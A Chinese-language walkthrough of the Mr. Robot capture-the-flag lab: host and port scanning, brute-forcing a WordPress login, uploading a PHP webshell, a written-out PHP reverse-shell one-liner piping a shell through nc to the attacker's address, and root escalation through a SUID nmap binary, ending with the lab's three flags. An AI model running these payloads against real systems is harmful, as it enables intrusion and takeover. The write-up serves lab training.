前景提要
md,今天想要继续webshell的时候kali卡死了,重启之后就一直只能进入命令行界面,按照网上的方法也访问不了图形化界面,只能回滚快照。配好环境在继续的时候,发现靶机给我玩坏了,不知道为啥访问80端口和443端口显示的都是我昨天写的phpinfo()页面。懒得重置了,前面信息收集懒得再做一遍了,将就看吧。
信息收集
主机发现
┌──(root㉿kali)-[~/桌面/webshell/Cknife]
└─ arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:68:c5:69, IPv4: 192.168.48.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.48.1 00:50:56:c0:00:08 VMware, Inc.
192.168.48.2 00:50:56:e1:fd:22 VMware, Inc.
192.168.48.144 00:0c:29:0a:5e:39 VMware, Inc.
192.168.48.254 00:50:56:f7:e7:0c VMware, Inc.
目标IP:192.168.48.144
扫端口
┌──(root㉿kali)-[~/桌面/webshell/Cknife]
└─ nmap -sC -sV -p- 192.168.48.144
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-22 18:44 CST
Nmap scan report for 192.168.48.144
Host is up (0.00051s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:0A:5E:39 (VMware)
22端口开了ssh服务没开,有点奇怪。
还开放了80和443端口,服务也都正常开放。
扫目录
┌──(root㉿kali)-[~]
└─ dirsearch -u http://192.168.48.144
结果过多
反正扫出来有意思的目录就
http://192.168.48.144/robot.txt
http://192.168.48.144/readme
http://192.168.48.144/wp-login
寻找Flag
信息利用
访问http://192.168.48.144/robot.txt发现第一个flag文件key-1-of-3.txt
另一个文件fsocity.dic下载下来一看就是一个可以用来爆破的文件,先保存为passwd.txt
密码爆破
http://192.168.48.144/wp-login是个后台登录页面,不能直接爆破用户名和密码,爆破文件中有八万条数据,这样爆破的话数据量太多了,所以我们先访问忘记密码页面爆破用户名
看到网上的一个思路是发现文件数据过多可以先进行去重,去重语句"sort fsocity.dic | uniq > dic.txt"
http://192.168.48.144/wp-login.php?action=lostpassword
利用burp爆破得到用户名有三个elliot、Elliot、ELLIOT
然后在登录界面爆破,得到用户elliot的密码ER28-0652
webshell
登录后台
查一查wardpress后台的webshell思路
https://www.cnblogs.com/dubh3/p/11561400.html
根据这篇文章的渗透思路
先找到插件上传点
成功上传phpinfo.php文件并且根据上传时间访问上传文件
http://192.168.48.144/wp-content/uploads/2023/04/phpinfo.php
OK,上传一句话木马然后访问
http://192.168.48.144/wp-content/uploads/2023/04/shell.php
C刀连接试试
应该是目标站点的php版本过高导致的,我记得之前看过一篇文章说Cknife的PHP版本限制只能在五点多以下吧
咱们换蚁剑!!!
安装过程还算顺利
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rjS8OKWu-1682186029229)(/root/.config/Typora/typora-user-images/image-20230423001545414.png)]
连接成功
成功找到flag2文件
下载到本地后
应该是没有读取文件的权限
在蚁剑打开的终端可以看到
但是后面的一个文件有可读的权限下下来打开看看
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rjS8OKWu-1682186029229)(/root/.config/Typora/typora-user-images/image-20230423001545414.png)]
应该是robot用户的密码的md5加密
淦,md5解密还要钱,作为白嫖党怎么能忍,我直接就从网上找攻略
密码是abcdefghijklmnopqrstuvwxyz
反弹shell
编写反弹shell的脚本然后上传
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.48.128 5555 >/tmp/f');?>
//反弹shell到192.168.48.128机器的5555端口
成功上传后在主机上启动监听,然后访问木马文件
192.168.48.144/wp-content/uploads/2023/04/Rebound_shell.php
┌──(root㉿kali)-[~]
└─ nc -lvp 5555
listening on [any] 5555 ...
192.168.48.144: inverse host lookup failed: Unknown host
connect to [192.168.48.128] from (UNKNOWN) [192.168.48.144] 47875
/bin/sh: 0: can't access tty; job control turned off
$ ls
Rebound_shell.php
shell1.php
$ su robot
su: must be run from a terminal
$
成功监听但是想要切换用户还是提醒“必须运行在一个终端”,淦,反弹的shell不算吗。
查了一下,反弹shell和蚁剑的终端都和交互式终端不一样,想要运行su这样的命令需要提升至交互式的shell
如何把一个简单的shell就升级到了一个标准交互式shell
https://www.jianshu.com/p/e7202cb2c3dd
在反弹的shell中写入如下脚本,然后就可以执行su命令了
$ python -c 'import pty; pty.spawn("/bin/bash")'
┌──(root㉿kali)-[~]
└─ nc -lvp 5555
listening on [any] 5555 ...
192.168.48.144: inverse host lookup failed: Unknown host
connect to [192.168.48.128] from (UNKNOWN) [192.168.48.144] 47877
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/uploads/2023/04$ su robot
<pps/wordpress/htdocs/wp-content/uploads/2023/04$ su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/opt/bitnami/apps/wordpress/htdocs/wp-content/uploads/2023/04$
OK,已经切换为robot用户了,去看看第二个flag
robot@linux:/home$ cd /home/robot
cd /home/robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
提权
第三个flag应该就放在root目录里面了,后面就是提权的操作了
robot@linux:~$ uname -a
uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
robot@linux:~$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
查询到目标主机的系统版本为Ubuntu 14.04.2,内核版本是3.13.0-55
searchsploit查查有没有可以利用的提权漏洞
┌──(root㉿kali)-[~]
└─ searchsploit privilege Ubuntu 14.04.2
#因为只要提权漏洞所以加入参数privilege
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privil | linux/local/36782.sh
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14. | linux_x86-64/local/42275.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Acces | linux/local/41760.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿kali)-[~]
└─ cd 桌面/MrRobot/
┌──(root㉿kali)-[~/桌面/MrRobot]
└─ searchsploit -m 36782
Exploit: Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/36782
Path: /usr/share/exploitdb/exploits/linux/local/36782.sh
Codes: CVE-2015-1318, OSVDB-120803
Verified: False
File Type: POSIX shell script, ASCII text executable
Copied to: /root/桌面/MrRobot/36782.sh
┌──(root㉿kali)-[~/桌面/MrRobot]
└─ ls
36782.sh key-2-of-3.txt MrRobot.md password.raw-md5
。。。。
才发现没有办法创建文件或者下载文件。。。这咋搞
看看sudo权限
robot@linux:~$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz
Sorry, user robot may not run sudo on linux.
查了下,找到了一个新姿势
利用可执行文件SUID进行Linux提权
如何利用参考这篇文章https://blog.csdn.net/qq_43632414/article/details/120592028#:~:text=%E5%B7%B2%E7%9F%A5%E5%8F%AF%E7%94%A8%E6%9D%A5%E9%80%9A%E8%BF%87SUID%E6%9D%83%E9%99%90%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83%E7%9A%84linux%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E5%A6%82%E4%B8%8B%EF%BC%9A%20nmap%20find%20vim%20bash,more%20less%20nano%20cp%20%2F%2F%E4%B9%9F%E5%B0%B1%E6%98%AF%E8%AF%B4%EF%BC%8C%E4%BB%A5%E4%B8%8A8%E4%B8%AA%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84%E6%96%87%E4%BB%B6%EF%BC%8C%E8%A6%81%E6%98%AF%E8%A2%AB%E8%AE%BE%E7%BD%AE%E4%BA%86suid%E6%9D%83%E9%99%90%EF%BC%8C%E5%B0%B1%E5%8F%AF%E4%BB%A5%E7%94%A8%E5%AE%83%E6%9D%A5%E8%BF%9B%E8%A1%8Clinux%E6%8F%90%E6%9D%83%201
使用命令:find / -user root -perm -4000 -print 2>/dev/null 寻找可以利用的命令,发现了nmap命令。
robot@linux:~$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
发现可以提权的文件nmap,看看版本符不符合
robot@linux:~$ nmap -v
nmap -v
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2023-04-22 17:37 UTC
No target machines/networks specified!
QUITTING!
在2.02至5.21之间,OK,开始提权
进入可交互模式 nmap --interactive
然后执行 !sh
,将提供一个权限提升的shell
robot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# ls
ls
key-2-of-3.txt password.raw-md5
# touch test.txt
touch test.txt
# ls
ls
key-2-of-3.txt password.raw-md5 test.txt
提权成功
接下来寻找flag3
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
总结
WordPress后台getshell思路
getshell后可以将其提升为交互式shell
一个新的提权思路:通过SUID权限文件提权